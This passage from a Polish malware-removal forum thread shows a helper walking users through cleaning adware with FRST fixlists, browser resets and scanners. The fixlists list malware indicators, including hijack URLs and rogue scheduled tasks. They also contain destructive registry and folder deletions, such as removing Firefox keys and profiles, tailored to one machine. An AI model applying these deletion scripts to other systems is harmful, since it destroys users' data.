ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Wyczyść i zabezpiecz przeglądarki. Google Chrome Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Rozszerzenia > odinstaluj wszystkie nieznane i niepotrzebne Ci rozszerzenia. Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko z wyjątkiem Google. Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin Mozilla FireFox Odłącz synchronizację (o ile włączona): KLIK. Menu Pomoc > Informacje dla pomocy technicznej > Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone. Menu Historia > Wyczyść historię przeglądania. Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin. 4. Pobierz AdwCleaner uruchom go i kliknij Skanuj, kiedy skanowanie zakończy się wydobądź z niego raport, znajduję się on w folderze C:\AdwCleaner. Raport zaprezentuj na forum. 5. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut. Dołącz też plik fixlog.txt.
  15. Zastouj DelFix (kasacja używanych narzędzi) oraz zaktualizuj oprogramowanie zewnętrzne oraz Windows.
  16. Spróbuj z poziomu Trybu Awaryjnego (klawisz F8 przed startem systemu).
  17. Skasuj wszystkie skróty Program uruchamiający aplikację Chrome przez SHIFT + Delete. Resztę zostaw. To co kończymy? Dawać finalizację? Czy jeszcze coś wyskoczyło może?
  18. Tak, detekcję MBAM do kasacji. Po tym już niby wszystko powinno być OK, aczkolwiek pokaż mi zawartość folderu: C:\Users\paulinka\AppData\Local\Google\Chrome\User Data. Fałszywy starter powinien tam siedzieć i widać go w logu, aczkolwiek Fixlog zwraca błąd, że go nie znaleziono.
  19. Tą stroną zajmę się ew. później. Usuwam infekcję Quotenamron oraz inne adware, które m.in zmodyfikowała skróty przeglądarek i Harmonogram Zadań. Co do tego drugiego to jednak nie będzie on czyszczony przez FRST całościowo, bo ilość wpisów Quotenamron mogłaby zawiesić system i samo FRST. Limit posta również zablokuję mi wiadomość ze względów bezpieczeństwa. Zdaję się na to, że uda się go odinstalować lub przynajmniej usunąć jego wszystkie elementy z pominięciem Harmonogramu Zadań. Portale z oprogramowaniem / Instalatory - na co uważać 1. Wejdź do folderu C:\ProgramData\\Quotenamron i z jego poziomu spróbuj uruchomić plik deinstalacyjny (nazwa pliku zbliżona do uninstall.exe). 2. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: Task: {167C0F0B-1DA5-4D0C-931D-6C668B9CEFFB} - System32\Tasks\snf => C:\ProgramData\Quotenamron\Quotenamron.exe [2016-04-02] () Task: {D45255EB-5729-493F-A504-22B3D35C184E} - System32\Tasks\snp => C:\ProgramData\Quotenamron\Quotenamron.exe [2016-04-02] () Task: {938405A3-4042-4059-AF71-B2DB1ABB9A30} - System32\Tasks\Radosław GwiazdaCosmogonicWerewolvesV2 => Rundll32.exe ChicoryAromatics.dll,main 7 1 Task: {D2D37B66-6FE4-415F-8560-8723B0AD8BE7} - System32\Tasks\{69F462A4-A395-36C9-A56F-545E11228F88} => C:\Users\RADOSA~1\AppData\Roaming\{69F46~1\SYNCVE~1.EXE Task: C:\Windows\Tasks\{69F462A4-A395-36C9-A56F-545E11228F88}.job => C:\Users\RADOSA~1\AppData\Roaming\{69F46~1\SYNCVE~1.EXE C:\Users\RADOSA~1\AppData\Roaming\{69F46~1 ShortcutWithArgument: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP% ShortcutWithArgument: C:\Users\admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> %SNP% ShortcutWithArgument: C:\Users\admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP% ShortcutWithArgument: C:\Users\admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> %SNP% ShortcutWithArgument: C:\Users\admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP% ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> %SNP% ShortcutWithArgument: C:\Users\Radosław Gwiazda\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP% ShortcutWithArgument: C:\Users\Radosław Gwiazda\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP% ShortcutWithArgument: C:\Users\Radosław Gwiazda\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP% HKU\S-1-5-21-875974235-824227338-3367428378-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRYSttY34mamef947lyuPOB2E6QjqkhGUG5bEYrD3HCxIYKUjs5WKHJrP8oAaZY17BAECfpHcSEQWXwvT3V2mfIOVBMBTYqMSlTPpOq5xe4XHSu9NfaiSkrbndIhGBvPNdrxqEK2yiBW8Wmz606lOkJPUiEqQ2JUBb-fST4HN0szw&q={searchTerms} HKU\S-1-5-21-875974235-824227338-3367428378-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRYSttY34mamef947lyuPOB2E6QjqkhGUG5bEYrD3HCxIYKUjs5WKHJrP8oAaZY17BAECfpHcSEQWXwvT3V2mfIOVBMBTYqMSmRPnb47s-pxrJ1YpnhOqNc9eYjsDuOq779sh50SB8t-_IXUnFwVLh2r9o-MVh0kJzkYxpKVHwJAk SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM-x32 -> DefaultScope {ielnksrch} URL = SearchScopes: HKLM-x32 -> ielnksrch URL = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRYSttY34mamef947lyuPOB2E6QjqkhGUG5bEYrD3HCxIYKUjs5WKHJrP8oAaZY17BAECfpHcSEQWXwvT3V2mfIOVBMBTYqMSlTPpOq5xe4XHSu9NfaiSkrbndIhGBvPNdrxqEK2yiBW8Wmz606lOkJPUiEqQ2JUBb-fST4HN0szw&q={searchTerms} SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-21-875974235-824227338-3367428378-1001 -> DefaultScope {ielnksrch} URL = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRYSttY34mamef947lyuPOB2E6QjqkhGUG5bEYrD3HCxIYKUjs5WKHJrP8oAaZY17BAECfpHcSEQWXwvT3V2mfIOVBMBTYqMSlTPpOq5xe4XHSu9NfaiSkrbndIhGBvPNdrxqEK2yiBW8Wmz606lOkJPUiEqQ2JUBb-fST4HN0szw&q={searchTerms} SearchScopes: HKU\S-1-5-21-875974235-824227338-3367428378-1001 -> {EB11FC60-423A-437F-8019-2F2F6E4D7D22} URL = SearchScopes: HKU\S-1-5-21-875974235-824227338-3367428378-1001 -> {ielnksrch} URL = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRYSttY34mamef947lyuPOB2E6QjqkhGUG5bEYrD3HCxIYKUjs5WKHJrP8oAaZY17BAECfpHcSEQWXwvT3V2mfIOVBMBTYqMSlTPpOq5xe4XHSu9NfaiSkrbndIhGBvPNdrxqEK2yiBW8Wmz606lOkJPUiEqQ2JUBb-fST4HN0szw&q={searchTerms} CHR HomePage: Default -> hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRYSttY34mamef947lyuPOB2E6QjqkhGUG5bEYrD3HCxIYKUjs5WKHJrP8oAaZY17BAECfpHcSEQWXwvT3V2mfIOVBMBTYqMSlSgkQQgl4QIln_w_iAiQt17J-DYCXK4zrBecwuWsHvFVnJRiHaLNe71Hk5a51fTUlhfcoKz6A2Ln 2016-04-02 18:22 - 2016-04-02 18:22 - 6504960 _____ () C:\Users\Radosław Gwiazda\AppData\Roaming\agent.dat 2016-04-02 18:22 - 2016-04-02 18:22 - 1132544 _____ () C:\Users\Radosław Gwiazda\AppData\Roaming\Blackkeydox.exe 2016-04-02 18:22 - 2016-04-02 18:22 - 1626339 _____ () C:\Users\Radosław Gwiazda\AppData\Roaming\Blackkeydox.tst 2016-04-02 18:22 - 2016-04-02 18:22 - 0065232 _____ () C:\Users\Radosław Gwiazda\AppData\Roaming\Config.xml 2016-04-02 18:22 - 2016-04-02 18:22 - 0233797 _____ () C:\Users\Radosław Gwiazda\AppData\Roaming\inst.lat 2016-04-02 18:22 - 2016-04-02 18:22 - 0014208 _____ () C:\Users\Radosław Gwiazda\AppData\Roaming\InstallationConfiguration.xml 2016-04-02 18:22 - 2016-04-02 18:22 - 0127488 _____ () C:\Users\Radosław Gwiazda\AppData\Roaming\Installer.dat 2016-04-02 18:22 - 2016-04-02 18:22 - 0018432 _____ () C:\Users\Radosław Gwiazda\AppData\Roaming\Main.dat 2016-04-02 18:22 - 2016-04-02 18:22 - 0005568 _____ () C:\Users\Radosław Gwiazda\AppData\Roaming\md.xml 2016-04-02 18:22 - 2016-04-02 18:22 - 0126464 _____ () C:\Users\Radosław Gwiazda\AppData\Roaming\noah.dat 2016-04-02 18:23 - 2016-04-02 18:23 - 0032038 _____ () C:\Users\Radosław Gwiazda\AppData\Roaming\uninstall_temp.ico 2016-04-02 18:22 - 2016-04-02 18:22 - 0402905 _____ () C:\Users\Radosław Gwiazda\AppData\Roaming\Unodox.bin S2 Quotenamron; C:\ProgramData\\Quotenamron\\Quotenamron.exe [1132544 2016-04-02] () [brak podpisu cyfrowego] AppInit_DLLs: C:\ProgramData\Quotenamron\U-hold.dll => C:\ProgramData\Quotenamron\U-hold.dll [358912 2017-03-16] () AppInit_DLLs-x32: C:\ProgramData\Quotenamron\FreshDonfresh.dll => C:\ProgramData\Quotenamron\FreshDonfresh.dll [1245 2017-05-13] () RemoveDirectory: C:\ProgramData\\Quotenamron CHR DefaultSearchURL: Default -> hxxp://feed.safefinder.biz/?fext=true&publisherid=51218&publisher=extensiondefaultap&st=ed&q={searchTerms} CHR DefaultSearchKeyword: Default -> SafeFinder C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PDFCreator\Licenses\AFPL License.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PDFCreator\Licenses\FairPlay License.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PDFCreator\Licenses\GPL License.lnk C:\Users\Radosław Gwiazda\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\UserGuide.lnk DeleteKey: HKCU\Software\Mozilla\Firefox DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Mozilla\Firefox DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla\Firefox DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins C:\Users\Radosław Gwiazda\AppData\Local\Mozilla\Firefox C:\Users\Radosław Gwiazda\AppData\Roaming\Mozilla\Firefox C:\Users\Radosław Gwiazda\AppData\Roaming\Profiles EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Wyczyść i zabezpiecz przeglądarkę Google Chrome: Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Rozszerzenia > odinstaluj wszystkie nieznane i niepotrzebne Ci rozszerzenia. Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko z wyjątkiem Google. Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin 4. Pobierz AdwCleaner uruchom go i kliknij Skanuj, kiedy skanowanie zakończy się wydobądź z niego raport, znajduję się on w folderze C:\AdwCleaner. Raport zaprezentuj na forum. 5. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut Dołącz też plik fixlog.txt.
  20. Jest dużo lepiej, wdrążam poprawki oraz kompelksowy skan przeciwwirusowy. Myślę, że zbliżamy się do końca. 1. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: DeleteKey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Bagsarah DeleteKey: HKEY_USERS\S-1-5-21-4102225431-1871780152-3223173906-1000\Software\Bagsarah DeleteKey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Everness DeleteKey: HKEY_USERS\S-1-5-21-4102225431-1871780152-3223173906-1000\Software\Everness CustomCLSID: HKU\S-1-5-21-4102225431-1871780152-3223173906-1000_Classes\CLSID\{590C4387-5EBD-4D46-8A84-CD0BA2EF2856}\InprocServer32 -> C:\Users\Kasia\AppData\Local\Google\Update\1.3.30.3\psuser_64.dll => Brak pliku 2017-05-12 11:37 - 2017-05-12 12:29 - 00000000 _____ C:\Windows\SysWOW64\1111 2017-05-12 11:37 - 2017-05-12 11:37 - 00000000 _____ C:\Windows\SysWOW64\3333333 2017-05-12 11:37 - 2017-05-12 11:37 - 00000000 _____ C:\Windows\SysWOW64\33 2017-05-12 11:37 - 2017-05-12 11:37 - 00000000 _____ C:\Windows\SysWOW64\1111111 2017-05-12 11:37 - 2017-05-12 11:37 - 00000000 _____ C:\Windows\SysWOW64\00 2017-04-27 14:22 - 2017-05-02 21:22 - 00000000 ____D C:\Program Files (x86)\BiaoJi SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Całościowo przeskanuj system za pomocą Malwarebytes AntiMalware. Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport. 3. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut Dołącz też plik fixlog.txt. Podsumuj również obecny stan systemu.
  21. MBAM niczego nie wykrywa. System wyczyszczony z infekcji, a skoro piszesz, że problem infekcyjny ustąpił to będziemy kończyć. Zastouj DelFix (kasacja używanych narzędzi) oraz zaktualizuj oprogramowanie zewnętrzne oraz Windows. Jako, że świadczymy profesjonalną pomoc i tylko taką to związku z wolniejszym startem systemu pokieruję Ci do działu Windows 7, może tam ktoś coś na to poradzi.
  22. Temat założony w złym dziale. Przenoszę z Software do Oprogramowanie zabezpieczające.
  23. Fajnie się to zagoiło. Opór postawił tylko fałszywy starter przeglądarki (to nie to samo o czym rozwaliliśmy na PW). Proxy kasuję. uTorrent nie widać już...być może to była jakaś resztka? Jeśli chodzi o programy do deinstalacji to dałem tylko te flagowane, nie jestem w stanie stwierdzić co użytkownik używa, a czego nie. Powiedz mu, by przejrzał jeszcze i poinstruuj jak odinstalować. Cóż...zbliżamy się do końca sprawy. Co do plików TEMP to faktycznie dużo zajmowały, aczkolwiek widziałem większe ilości, wyniki przekraczały 100 GB na dysku 1 TB. 1. Wszystkie zagrożenia wykryte przez AdwCleaner daj do kasacji (za pomocą opcji Oczyść). 2. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: SearchScopes: HKU\S-1-5-21-1822749172-3988503527-1915266406-1000 -> DefaultScope {213BD86A-D8DE-47C7-AA9A-CF771C6850EF} URL = ProxyEnable: [.DEFAULT] => Proxy is enabled. ProxyServer: [.DEFAULT] => http=127.0.0.1:49192;https=127.0.0.1:49192 ShortcutWithArgument: C:\Users\paulinka\AppData\Local\Google\Chrome\User Data\Program uruchamiający aplikacje Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --show-app-list ShortcutWithArgument: C:\Users\paulinka\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google Chrome\Program uruchamiający aplikacje Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --show-app-list RemoveProxy: EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Całościowo przeskanuj system za pomocą Malwarebytes AntiMalware (masz zainstalowany, więc robisz tylko aktualizację baz i programu). Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport. 4. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut Dołącz też plik fixlog.txt. Podsumuj również obecny stan systemu.
×
×
  • Dodaj nową pozycję...